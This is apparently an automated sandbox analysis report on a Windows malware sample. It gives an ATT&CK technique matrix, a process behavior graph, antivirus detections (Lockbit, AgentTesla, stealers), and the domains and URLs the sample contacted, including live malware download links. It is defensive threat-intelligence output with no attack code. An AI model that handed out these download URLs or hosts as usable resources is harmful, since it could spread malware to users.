                        Valid AccountsNative API11DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsExploitation for Client Execution1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Process Injection512Obfuscated Files or Information4Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing34NTDSSystem Information Discovery165Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol25Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery10101VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading11Proc FilesystemVirtualization/Sandbox Evasion471Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion471/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection512Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 531737 Sample: QMn13jz6nj.exe Startdate: 01/12/2021 Architecture: WINDOWS Score: 100 64 www.google.com 2->64 66 unic7m.top 2->66 68 cdn.discordapp.com 2->68 88 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->88 90 Antivirus detection for URL or domain 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 14 other signatures 2->94 11 QMn13jz6nj.exe 2->11         started        13 ddigjgj 2->13         started        signatures3 process4 signatures5 16 QMn13jz6nj.exe 11->16         started        138 Machine Learning detection for dropped file 13->138 140 Contains functionality to inject code into remote processes 13->140 142 Injects a PE file into a foreign processes 13->142 19 ddigjgj 13->19         started        process6 signatures7 80 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 16->80 82 Maps a DLL or memory area into another process 16->82 84 Checks if the current machine is a virtual machine (disk enumeration) 16->84 21 explorer.exe 16 16->21 injected 86 Creates a thread in another existing process (thread injection) 19->86 process8 dnsIp9 70 file-file-host4.com 95.213.165.249, 49749, 49750, 49751 SELECTELRU Russian Federation 21->70 72 cdn.discordapp.com 162.159.135.233, 443, 49759 CLOUDFLARENETUS United States 21->72 74 4 other IPs or domains 21->74 56 C:\Users\user\AppData\Roaming\ddigjgj, PE32 21->56 dropped 58 C:\Users\user\AppData\Local\Temp\D466.exe, PE32 21->58 dropped 60 C:\Users\user\AppData\Local\Temp\D375.exe, PE32 21->60 dropped 62 6 other files (5 malicious) 21->62 dropped 96 System process connects to network (likely due to code injection or exploit) 21->96 98 Benign windows process drops PE files 21->98 100 Deletes itself after installation 21->100 102 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->102 26 D375.exe 21->26         started        29 A70A.exe 4 21->29         started        32 AA02.exe 127 21->32         started        35 4 other processes 21->35 file10 signatures11 process12 dnsIp13 112 Antivirus detection for dropped file 26->112 114 Multi AV Scanner detection for dropped file 26->114 116 Query firmware table information (likely to detect VMs) 26->116 136 2 other signatures 26->136 76 45.9.20.149, 42871, 49850 DEDIPATH-LLCUS Russian Federation 29->76 118 Detected unpacking (changes PE section rights) 29->118 120 Tries to detect sandboxes and other dynamic analysis tools (window names) 29->120 122 Machine Learning detection for dropped file 29->122 124 Tries to evade analysis by execution special instruction which cause usermode exception 29->124 78 file-file-host4.com 32->78 52 C:\Users\user\AppData\...\sqlite3[1].dll, PE32 32->52 dropped 54 C:\ProgramData\sqlite3.dll, PE32 32->54 dropped 126 Detected unpacking (overwrites its own PE header) 32->126 128 Tries to harvest and steal browser information (history, passwords, etc) 32->128 130 Tries to steal Crypto Currency Wallets 32->130 132 Contains functionality to detect sleep reduction / modifications 32->132 37 cmd.exe 32->37         started        134 Injects a PE file into a foreign processes 35->134 39 B6B5.exe 35->39         started        42 C169.exe 2 35->42         started        44 conhost.exe 35->44         started        46 2 other processes 35->46 file14 signatures15 process16 signatures17 48 conhost.exe 37->48         started        50 timeout.exe 37->50         started        104 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 39->104 106 Maps a DLL or memory area into another process 39->106 108 Checks if the current machine is a virtual machine (disk enumeration) 39->108 110 Creates a thread in another existing process (thread injection) 39->110 process18

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        QMn13jz6nj.exe47%VirustotalBrowse
                        QMn13jz6nj.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\C169.exe100%AviraHEUR/AGEN.1144480
                        C:\Users\user\AppData\Local\Temp\D375.exe100%AviraTR/Crypt.XPACK.Gen2
                        C:\Users\user\AppData\Local\Temp\D466.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\AA02.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\C169.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\B6B5.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\A70A.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\ddigjgj100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\D375.exe100%Joe Sandbox ML
                        C:\ProgramData\sqlite3.dll3%MetadefenderBrowse
                        C:\ProgramData\sqlite3.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\A70A.exe26%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\A70A.exe57%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Temp\C169.exe37%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\C169.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                        C:\Users\user\AppData\Local\Temp\D375.exe43%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\D375.exe86%ReversingLabsWin32.Trojan.SelfDel
                        C:\Users\user\AppData\Local\Temp\D466.exe29%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\D466.exe51%ReversingLabsWin32.Trojan.Lockbit

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        23.0.C169.exe.990000.2.unpack100%AviraHEUR/AGEN.1144480Download File
                        2.0.QMn13jz6nj.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        0.2.QMn13jz6nj.exe.2d015a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        31.0.EE61.exe.400000.8.unpack100%AviraHEUR/AGEN.1143239Download File
                        26.0.D375.exe.8e0000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                        28.0.B6B5.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        2.2.QMn13jz6nj.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        23.0.C169.exe.990000.5.unpack100%AviraHEUR/AGEN.1144480Download File
                        8.1.ddigjgj.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        9.0.ddigjgj.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        11.0.A70A.exe.12e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        19.1.D466.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        16.0.C169.exe.900000.1.unpack100%AviraHEUR/AGEN.1144480Download File
                        28.0.B6B5.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        19.0.D466.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        2.1.QMn13jz6nj.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        23.0.C169.exe.990000.7.unpack100%AviraHEUR/AGEN.1144480Download File
                        9.0.ddigjgj.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        16.0.C169.exe.900000.0.unpack100%AviraHEUR/AGEN.1144480Download File
                        9.2.ddigjgj.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        26.0.D375.exe.8e0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                        23.0.C169.exe.990000.11.unpack100%AviraHEUR/AGEN.1144480Download File
                        8.2.ddigjgj.47915a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        22.2.AA02.exe.5b0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                        2.0.QMn13jz6nj.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        23.0.C169.exe.990000.3.unpack100%AviraHEUR/AGEN.1144480Download File
                        9.0.ddigjgj.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        31.2.EE61.exe.400000.0.unpack100%AviraHEUR/AGEN.1143239Download File
                        9.1.ddigjgj.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        23.0.C169.exe.990000.1.unpack100%AviraHEUR/AGEN.1144480Download File
                        16.0.C169.exe.900000.2.unpack100%AviraHEUR/AGEN.1144480Download File
                        11.0.A70A.exe.12e0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        31.0.EE61.exe.400000.4.unpack100%AviraHEUR/AGEN.1143239Download File
                        11.0.A70A.exe.12e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        16.0.C169.exe.900000.3.unpack100%AviraHEUR/AGEN.1144480Download File
                        16.2.C169.exe.900000.0.unpack100%AviraHEUR/AGEN.1144480Download File
                        19.0.D466.exe.48d0e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        19.3.D466.exe.48e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        19.0.D466.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        23.0.C169.exe.990000.9.unpack100%AviraHEUR/AGEN.1144480Download File
                        23.0.C169.exe.990000.13.unpack100%AviraHEUR/AGEN.1144480Download File
                        26.2.D375.exe.8e0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                        22.3.AA02.exe.5e0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                        26.0.D375.exe.8e0000.2.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                        19.0.D466.exe.48d0e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        23.2.C169.exe.990000.1.unpack100%AviraHEUR/AGEN.1144480Download File
                        26.0.D375.exe.8e0000.3.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                        11.1.A70A.exe.12e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        0.1.QMn13jz6nj.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        11.3.A70A.exe.3460000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                        31.0.EE61.exe.400000.10.unpack100%AviraHEUR/AGEN.1143239Download File
                        23.0.C169.exe.990000.0.unpack100%AviraHEUR/AGEN.1144480Download File
                        28.0.B6B5.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        28.2.B6B5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        2.0.QMn13jz6nj.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        28.1.B6B5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        25.2.B6B5.exe.4e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        31.0.EE61.exe.400000.6.unpack100%AviraHEUR/AGEN.1143239Download File
                        22.2.AA02.exe.400000.0.unpack100%AviraHEUR/AGEN.1123417Download File
                        11.0.A70A.exe.12e0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://host-file-host-3.com/files/8723_1638191106_2017.exe3%VirustotalBrowse
                        http://host-file-host-3.com/files/8723_1638191106_2017.exe100%Avira URL Cloudmalware
                        http://hose-file-host4.com/sqlite3.dll0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                        http://hosile-file-host4.com/tratata.php0%Avira URL Cloudsafe
                        http://www.ncn.gov.pl/finansowanie-nauki/pomoc-publiczna0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                        http://host-file-host-3.com/files/5311_1638303032_7343.exe100%Avira URL Cloudmalware
                        http://host-file-host-3.com/files/6096_1638289274_6885.exe100%Avira URL Cloudmalware
                        https://api.ip.sb/ip0%URL Reputationsafe
                        http://microsoft.co0%URL Reputationsafe
                        https://socfinder.site/0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                        http://host-file-host-3.com/game.exe0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                        http://95.181.152.1390%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id22Responsex0%URL Reputationsafe
                        https://cdn.discordapp.com40%URL Reputationsafe
                        http://tempuri.org/Entity/Id19Responsex0%Avira URL Cloudsafe
                        http://privacytoolzforyou-7000.com/downloads/toolspab3.exe100%Avira URL Cloudmalware
                        http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                        https://socfinder.site0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
                        http://file-file-host4.com/sqlite3.dll0%URL Reputationsafe
                        https://get.adob0%URL Reputationsafe
                        http://tempuri.org/Entity/Id18Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id3Response0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        host-data-coin-11.com
                        		95.213.165.249
                        		truefalse
                          		high
                          privacytoolzforyou-7000.com
                          		95.213.165.249
                          		truefalse
                            		high
                            cdn.discordapp.com
                            		162.159.135.233
                            		truefalse
                              		high
                              host-file-host-3.com
                              		95.213.165.249
                              		truefalse
                                		high
                                www.google.com
                                		142.250.184.100
                                		truefalse
                                  		high
                                  file-file-host4.com
                                  		95.213.165.249
                                  		truefalse
                                    		high
                                    unic7m.top
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://host-file-host-3.com/files/8723_1638191106_2017.exetrue
                                      • 3%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://host-file-host-3.com/files/5311_1638303032_7343.exetrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://host-file-host-3.com/files/6096_1638289274_6885.exetrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://host-file-host-3.com/game.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.discordapp.com/attachments/914960103592054858/914961866462232616/Oldening.exefalse
                                        		high
                                        http://privacytoolzforyou-7000.com/downloads/toolspab3.exetrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://file-file-host4.com/sqlite3.dllfalse
                                        • URL Reputation: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                            		high
                                            https://duckduckgo.com/chrome_newtabA70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://hose-file-host4.com/sqlite3.dllAA02.exe, 00000016.00000002.528893220.00000000008FB000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://tempuri.org/Entity/Id12ResponseA70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tempuri.org/C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tempuri.org/Entity/Id2ResponseC169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Entity/Id21ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://support.google.com/chrome/?p=plugin_realA70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://hosile-file-host4.com/tratata.phpAA02.exe, 00000016.00000002.529782826.000000000094E000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.ncn.gov.pl/finansowanie-nauki/pomoc-publicznaA70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/Entity/Id15ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.jsA70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://api.ip.sb/ipA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, C169.exe, 00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://microsoft.coC169.exe, 00000017.00000002.605485647.00000000068A5000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://socfinder.site/A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id24ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.597967542.0000000002FE1000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://support.google.com/chrome/?p=plugin_shockwaveC169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                              		high
